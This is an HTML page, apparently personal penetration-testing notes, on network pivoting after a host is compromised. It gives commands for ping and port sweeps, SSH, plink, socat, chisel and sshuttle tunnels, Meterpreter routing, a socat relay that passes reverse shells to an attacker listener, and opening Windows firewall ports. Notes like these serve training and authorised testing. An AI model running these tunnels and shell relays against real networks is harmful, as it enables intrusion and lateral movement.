<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<!-- NOTE(review): every third-party script on this page (fuse.js, jQuery, MathJax) is loaded
     without Subresource Integrity (no integrity= / crossorigin attributes), and fuse.js is not
     pinned to a version, so jsdelivr serves whatever the current release happens to be. A CDN
     compromise or a malicious upstream release would then run on every page of this site.
     Pin the version and add SRI hashes. -->
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
< script src = "https://code.jquery.com/jquery-3.5.1.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/auto-complete.js" > < / script >
< script type = "text/javascript" src = "/static/js/lunr.min.js" > < / script >
< script type = "text/javascript" src = "/static/js/search.js" > < / script >
< link rel = "stylesheet" href = "/static/stylesheet.css" >
< link rel = "stylesheet" href = "/static/auto-complete.css" >
< br >
< title > The Real Hugo< / title >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< / head >
< body >
< / center >
< p > < / p >
< div class = "columns" >
< div class = "column column-2" >
< span class = "body" >
< style > p r e { l i n e - h e i g h t : 1 2 5 % ; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */< / style >
< div class = "column column-3" >
< ul >
< li > < a href = "#pivoting" > Pivoting< / a > < ul >
< li > < a href = "#enumeration" > Enumeration< / a > < ul >
< li > < a href = "#using-material-found-on-the-machine-and-preinstalled-tools" > Using material found on the machine and preinstalled tools< / a > < / li >
< li > < a href = "#scripting-techniques" > Scripting Techniques< / a > < / li >
< / ul >
< / li >
<li><a href="#tools">Tools</a><ul>
<li><a href="#proxychains-foxyproxy">Proxychains / FoxyProxy</a></li>
<li><a href="#ssh-port-forwarding-and-tunnelling-primarily-unix">SSH port forwarding and tunnelling (primarily Unix)</a></li>
<li><a href="#plinkexe-windows">plink.exe (Windows)</a></li>
<li><a href="#socat">Socat</a></li>
<li><a href="#chisel">Chisel</a></li>
<li><a href="#sshuttle">sshuttle</a></li>
<li><a href="#meterpreter">Meterpreter</a><ul>
<li><a href="#meterpreter-auto-routing">Meterpreter Auto Routing</a></li>
<li><a href="#meterpreter-proxy-routing">Meterpreter Proxy Routing</a></li>
</ul>
</li>
<li><a href="#rpivot">rpivot</a></li>
</ul>
</li>
<li><a href="#links">Links</a></li>
</ul>
</li>
</ul>
< / div >
< h1 id = "pivoting" > Pivoting< / h1 >
< ul >
< li > Tunnelling/Proxying< / li >
< li > Port Forwarding< / li >
< / ul >
< h2 id = "enumeration" > Enumeration< / h2 >
< h3 id = "using-material-found-on-the-machine-and-preinstalled-tools" > Using material found on the machine and preinstalled tools< / h3 >
< ul >
< li > < code > arp -a< / code > < / li >
< li > < code > /etc/hosts< / code > or < code > C:\Windows\System32\drivers\etc\hosts< / code > < / li >
< li > < code > /etc/resolv.conf< / code > < / li >
< li > < code > ipconfig /all< / code > < / li >
< li > < code > nmcli dev show< / code > < / li >
< li > < a href = "https://github.com/andrew-d/static-binaries.git" > Statically compiled tools< / a > < / li >
< / ul >
< h3 id = "scripting-techniques" > Scripting Techniques< / h3 >
<div class="codehilite"><pre><span></span><code><span class="k">for</span> i <span class="k">in</span> <span class="o">{</span><span class="m">1</span>..255<span class="o">}</span><span class="p">;</span> <span class="k">do</span> <span class="o">(</span>ping -c <span class="m">1</span> <span class="m">192</span>.168.0.<span class="si">${</span><span class="nv">i</span><span class="si">}</span> <span class="p">|</span> grep <span class="s2">"bytes from"</span> <span class="p">&amp;</span><span class="o">)</span><span class="p">;</span> <span class="k">done</span>
<span class="k">for</span> i <span class="k">in</span> <span class="o">{</span><span class="m">1</span>..65535<span class="o">}</span><span class="p">;</span> <span class="k">do</span> <span class="o">(</span><span class="nb">echo</span> &gt; /dev/tcp/192.168.0.1/<span class="nv">$i</span><span class="o">)</span> &gt; /dev/null <span class="m">2</span>&gt;<span class="p">&amp;</span><span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="nv">$i</span> is open<span class="p">;</span> <span class="k">done</span>
< / code > < / pre > < / div >
< ul >
<li>Using local tools through a proxy like <code>nmap</code> (see Proxychains below; only TCP connect scans work through a SOCKS proxy)</li>
<li>Both loops above are bash-only (<code>{1..255}</code> ranges and <code>/dev/tcp</code> are bash features, not POSIX <code>sh</code>), and they are noisy: 255 concurrent pings and a full 65535-port sweep stand out in IDS and flow logs</li>
< / ul >
< h2 id = "tools" > Tools< / h2 >
< ul >
< li > Enumerating a network using native and statically compiled tools< / li >
< / ul >
< h3 id = "proxychains-foxyproxy" > Proxychains / FoxyProxy< / h3 >
< ul >
<li>For dynamic port forwarding when the jumpserver has an SSH <em>client</em>, open a reverse SOCKS proxy from the jumpserver back to the attacker box (OpenSSH &ge; 7.6: <code>-R</code> with only a port and no destination turns that port into a SOCKS proxy on the attacker's side), then point proxychains at it
<code>sh
ssh &lt;username&gt;@$ATTACKER_IP -R 9050 -N</code>
<ul>
<li>This leaves credentials for the attacker box on a compromised host: use a dedicated, unprivileged account (see the SSH tips below), never your own user</li>
</ul>
</li>
<li>Proxychains, e.g. scan the target via nmap, or connect via nc through the jumpserver
<code>sh
proxychains nc &lt;IP&gt; &lt;PORT&gt;
proxychains nmap -Pn -sT &lt;IP&gt;
proxychains ssh user@$TARGET_IP
proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
proxychains wget http://$TARGET_IP:8000/loot.zip</code>
<ul>
<li>nmap through a SOCKS proxy only works as a full TCP connect scan with host discovery disabled (<code>-sT -Pn</code>): SYN scans, UDP and ICMP are raw-socket traffic that proxychains cannot tunnel, so they bypass the proxy or report wrong results</li>
<li>Use <code>/etc/proxychains.conf</code> or <code>./proxychains.conf</code> containing:
<div class="codehilite"><pre><span></span><code>[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
# socks5 127.0.0.1 1337
# proxy_dns
</code></pre></div>
</li>
<li>Prefer <code>socks5</code> over <code>socks4</code> whenever the proxy supports it (SSH <code>-D</code>/<code>-R</code> and chisel do): SOCKS4 has no hostname or IPv6 support. Keep <code>proxy_dns</code> enabled (it belongs to the options section above <code>[ProxyList]</code>) so lookups of internal names travel through the tunnel instead of leaking to the attacker's local resolver</li>
</ul>
</li>
< li > FoxyProxy, choose proxy type, proxy IP and port in settings < / li >
< / ul >
< h3 id = "ssh-port-forwarding-and-tunnelling-primarily-unix" > SSH port forwarding and tunnelling (primarily Unix)< / h3 >
< ul >
< li >
< p > LocalPortForwarding
< code > sh
ssh -L $LOCAL_PORT:< IP_seen_from_Jumpserver> :< Port_seen_from_Jumpserver> < user> @< Jumpserver> -fN< / code > < / p >
< ul >
<li>Another possibility is to use the jumpserver directly from its CLI via <code>ssh &lt;username&gt;@&lt;jumpserver&gt; -L *:$LOCAL_PORT:127.0.0.1:80 -N</code>; the target is then reachable through the jumpserver. Note that <code>*</code> binds the forwarded port on every interface of the machine running ssh, so anyone who can reach that host can use the tunnel: bind to <code>127.0.0.1</code> unless the exposure is intended</li>
<li>Tip: open a port on a Windows target via
<code>sh
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%</code>
(needs an elevated shell, and the rule persists across reboots: remove it afterwards with <code>netsh advfirewall firewall delete rule name="new port"</code>)</li>
< / ul >
< / li >
< li >
< p > Dynamic Port Forwarding
< code > sh
ssh -D $PORT < user> @< Jumpserver> -fN< / code > < / p >
< / li >
< li >
<p>Reverse port forward, if there is an SSH client on the jumpserver but no SSH server, via
<code>sh
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP -i $KEYFILE -fN</code>
(run on the jumpserver; <code>$ATTACKER_IP</code> is the attacker's own machine, where <code>$LOCAL_PORT</code> is opened)</p>
<ul>
<li>Tip1: create a dedicated user on the attacker box to receive the connection, so the key or password left on the compromised jumpserver does not expose your own account</li>
<li>Tip2: use <code>-N</code> so no interactive shell is requested; the dedicated user does not need a usable shell at all. Go further and restrict its key in <code>~/.ssh/authorized_keys</code> with <code>restrict,port-forwarding</code> (optionally <code>permitlisten="$LOCAL_PORT"</code>, OpenSSH &ge; 7.8) so that whoever recovers the key from the jumpserver gets the forward and nothing else</li>
< / ul >
< / li >
< / ul >
< h3 id = "plinkexe-windows" > plink.exe (Windows)< / h3 >
< ul >
< li > < a href = "https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" > latest version< / a > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > cmd.exe /c < span class = "nb" > echo< / span > y < span class = "p" > |< / span > .< span class = "se" > \p< / span > link.exe -R < LocalPort> :< TargetIP> :< TargetPort> < user> @< Jumpserver> -i < key> -N
< / code > < / pre > < / div >
<ul>
<li>Key generation
<code>sh
puttygen &lt;keyfile&gt; -o key.ppk</code></li>
<li><code>echo y |</code> auto-accepts whatever host key the far end presents, i.e. it switches off the only MITM protection the connection has; acceptable on a throwaway lab, not elsewhere. The <code>-pw &lt;MYPASSWORD&gt;</code> form below additionally puts the password on the command line, where it is visible in process listings, command history and (if command-line auditing is on) the event log; prefer <code>-i &lt;key&gt;</code> with a restricted key as for OpenSSH above</li>
<li>Circumvention, described by <a href="https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d">U.Y.</a></li>
</ul>
< div class = "codehilite" > < pre > < span > < / span > < code > < span class = "nb" > echo< / span > y < span class = "p" > |< / span > < span class = "p" > & < / span > .< span class = "se" > \p< / span > link.exe -ssh -l < MYUSERNAME> -pw < MYPASSWORD> -R < MYIP> :< MYPORT> :127.0.0.1:< TARGETPORT> < MYIP>
< / code > < / pre > < / div >
< h3 id = "socat" > Socat< / h3 >
< ul >
< li >
<p>Reverse-shell relay on the pivot: connections to <code>&lt;pivot&gt;:8000</code> are forwarded to the attacker's listener on 443, so a shell from a deeper host only needs to reach the pivot. Without <code>fork</code> socat serves a single connection and exits
<code>sh
./socat tcp-l:8000 tcp:&lt;attacker-IP&gt;:443 &amp;</code></p>
< ul >
< li > Attacking bind shell
< code > sh
sudo nc -lvnp 443< / code > < / li >
< / ul >
< / li >
< li >
< p > Relay on jumpserver via
< code > sh
./socat tcp-l:33060,fork,reuseaddr tcp:< TargetIP> :3306 & < / code > < / p >
< / li >
< li >
< p > Quiet Port Forwarding< / p >
< ul >
< li > On attacker
< code > sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & < / code > < / li >
< li > On relay server
< code > sh
./socat tcp:< attacker-IP> :8001 tcp:< TargetIP> :< TargetPort> ,fork & < / code > < / li >
< li > Open < code > localhost:8000< / code > < / li >
< / ul >
< / li >
< li >
< p > Processes are backgrounded via < code > & < / code > . Therefore, the process can be quit by using the corresponding bg number like < code > kill %1< / code > .< / p >
< / li >
< li >
< p > In need of a Download on target, expose a port on the attacker via relay
< code > sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80< / code > < / p >
< / li >
< / ul >
< h3 id = "chisel" > Chisel< / h3 >
< ul >
< li > < strong > Does not require SSH on target< / strong > < / li >
< li >
< p > Reverse Proxy< / p >
< ul >
<li>Bind port on attacker
<code>sh
./chisel server -p &lt;ListeningPort&gt; --reverse --auth &lt;user&gt;:&lt;pass&gt; &amp;</code></li>
<li>Reverse port on target/proxy
<code>sh
./chisel client --auth &lt;user&gt;:&lt;pass&gt; &lt;attacker-IP&gt;:&lt;attacker-Port&gt; R:socks &amp;</code></li>
<li><code>proxychains.conf</code> contains
<code>sh
[ProxyList]
socks5 127.0.0.1 1080</code></li>
<li><code>R:socks</code> opens the SOCKS listener on the <em>server</em> side at chisel's default port 1080 (use <code>R:&lt;port&gt;:socks</code> to pick another), not on <code>&lt;ListeningPort&gt;</code>, which is the chisel control channel. <code>--reverse</code> lets any client that can reach <code>&lt;ListeningPort&gt;</code> open listeners on the attacker box, so always pair it with <code>--auth</code> (or the <code>AUTH</code> environment variable) on both ends, and pin the server with <code>--fingerprint</code> on the client</li>
< / ul >
< / li >
< li >
< p > Forward SOCKS Proxy< / p >
< ul >
< li > Proxy/compromised machine
< code > sh
./chisel server -p < Listen-Port> --socks5< / code > < / li >
< li > On attacker
< code > sh
./chisel client < target-IP> :< target-Port> < proxy-Port> :socks< / code > < / li >
< / ul >
< / li >
< li > Remote Port Forward< ul >
< li > On attacker
< code > sh
./chisel server -p < Listen-Port> --reverse & < / code > < / li >
< li > On forwarder
< code > sh
./chisel client < attacker-IP> :< attackerListen-Port> R:< Forwarder-Port> :< target-IP> :< target-Port> & < / code > < / li >
< / ul >
< / li >
< li > Local Port Forwarding< ul >
<li>On proxy
<code>sh
./chisel server -p &lt;Listen-Port&gt;</code></li>
<li>On attacker
<code>sh
./chisel client &lt;proxy-IP&gt;:&lt;Listen-Port&gt; &lt;local-Port&gt;:&lt;target-IP&gt;:&lt;target-Port&gt;</code></li>
<li>The remote spec is <code>[local-host:]local-port:remote-host:remote-port</code>; the first field is a port on the attacker box, not the attacker's IP. Without an explicit <code>local-host</code> chisel binds the forward on all interfaces, so use <code>127.0.0.1:&lt;local-Port&gt;:...</code> unless the exposure is intended</li>
< / ul >
< / li >
< / ul >
< h3 id = "sshuttle" > sshuttle< / h3 >
< ul >
< li > < code > pip install sshuttle< / code > < / li >
< li > < code > sshuttle -r < user> @< target> < subnet/CIDR> < / code > < / li >
< li > or automatically determined< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > sshuttle -r < user> @< target> -N
< / code > < / pre > < / div >
< ul >
< li > Key based auth< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > sshuttle -r < user> @< target> --ssh-cmd < span class = "s2" > " ssh -i < key> " < / span > < subnet/CIDR>
< / code > < / pre > < / div >
< ul >
< li > Exclude servers via < code > -x< / code > , for example the target/gateway server< / li >
< / ul >
< h3 id = "meterpreter" > Meterpreter< / h3 >
< ul >
< li > Meterpreter with payload < code > set payload linux/x64/meterpreter_reverse_tcp< / code > after successful connection do< / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > portfwd add -l < span class = "m" > 22< / span > -p < span class = "m" > 22< / span > -r < span class = "m" > 127< / span > .0.0.1
< / code > < / pre > < / div >
< h4 id = "meterpreter-auto-routing" > Meterpreter Auto Routing< / h4 >
< ul >
< li > Upload payload and catch it with < code > multi/handler< / code > < / li >
< / ul >
< div class = "codehilite" > < pre > < span > < / span > < code > background
use post/multi/manage/autoroute
set session 1
set subnet < 10.0.0.0>
run
< / code > < / pre > < / div >
< h4 id = "meterpreter-proxy-routing" > Meterpreter Proxy Routing< / h4 >
< ul >
<li>Start a SOCKS proxy that follows the Metasploit routing table via</li>
</ul>
<div class="codehilite"><pre><span></span><code>use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
run -j
</code></pre></div>
<ul>
<li>Set <code>proxychains.conf</code> on the attacker accordingly (<code>socks5 127.0.0.1 1080</code> with the module defaults). The module's default <code>SRVHOST</code> is <code>0.0.0.0</code>, which offers the pivot to everyone who can reach the attacker box; bind it to localhost unless sharing is intended</li>
< / ul >
< h3 id = "rpivot" > rpivot< / h3 >
< ul >
< li > < a href = "https://github.com/klsecservices/rpivot.git" > klsecservices' repo< / a > < / li >
< li > < a href = "https://github.com/klsecservices/rpivot/releases/tag/v1.0" > Their windows binary release< / a > < / li >
< / ul >
< h2 id = "links" > Links< / h2 >
< ul >
< li > < a href = "https://adepts.of0x.cc/shadowmove-hijack-socket/" > Shadowmove at the adepts of 0xcc< / a > < / li >
< / ul >
< / span >
< / div >
< / div >
< div id = "footer" >
< p > < / p >
< center >
© Stefan Friese
< / center >
< / div >
< script >
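/**
 * ontoggle handler for the sidebar <details> elements: remembers which
 * sections the reader has expanded so the restore loop further down can
 * re-open them on the next page of this tab (sessionStorage is per tab and
 * per origin).
 *
 * @param {HTMLDetailsElement} obj - the toggled element; its `id` is the
 *   storage key and its `open` property is the state that gets persisted.
 *
 * NOTE(review): the key is the element id, so restoring relies on ids being
 * unique. The generated menu reuses some (e.g. "docs" appears under more than
 * one parent) and getElementById() only ever finds the first of them.
 */
function linkClick(obj) {
  // A missing or empty id would be stored under the key "" and could never be
  // mapped back to an element, so there is nothing useful to persist.
  if (!obj || !obj.id) {
    return;
  }
  if (obj.open) {
    // setItem overwrites any previous value; no removeItem is needed first.
    sessionStorage.setItem(obj.id, "open");
  } else {
    sessionStorage.removeItem(obj.id);
  }
}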
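// Restore the sidebar state saved by linkClick(): re-open every <details>
// whose id is stored as "open" in this tab's sessionStorage.
// sessionStorage may also hold keys written by other scripts on this origin,
// or ids that are not present on this page; getElementById() returns null for
// those, so the lookup is guarded instead of dereferenced blindly (the
// original threw a TypeError on the first such key and restored nothing).
for (const storedId of Object.keys(sessionStorage)) {
  if (sessionStorage.getItem(storedId) !== "open") {
    continue;
  }
  const details = document.getElementById(storedId);
  if (details) {
    details.open = true;
  }
}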
< / script >
<!-- NOTE(review): MathJax 2.7.1 from cdnjs, again without integrity=/crossorigin; the 2.x line has
     been superseded by MathJax 3. Because this tag is async, the text/x-mathjax-config block below
     may not be parsed yet when MathJax.js executes, so its extra Hub.Config is applied only if the
     download happens to finish late; the ?config= parameter already carries the working setup. -->
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
< script type = "text/x-mathjax-config" >
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
< / script >
< / body >
< / html >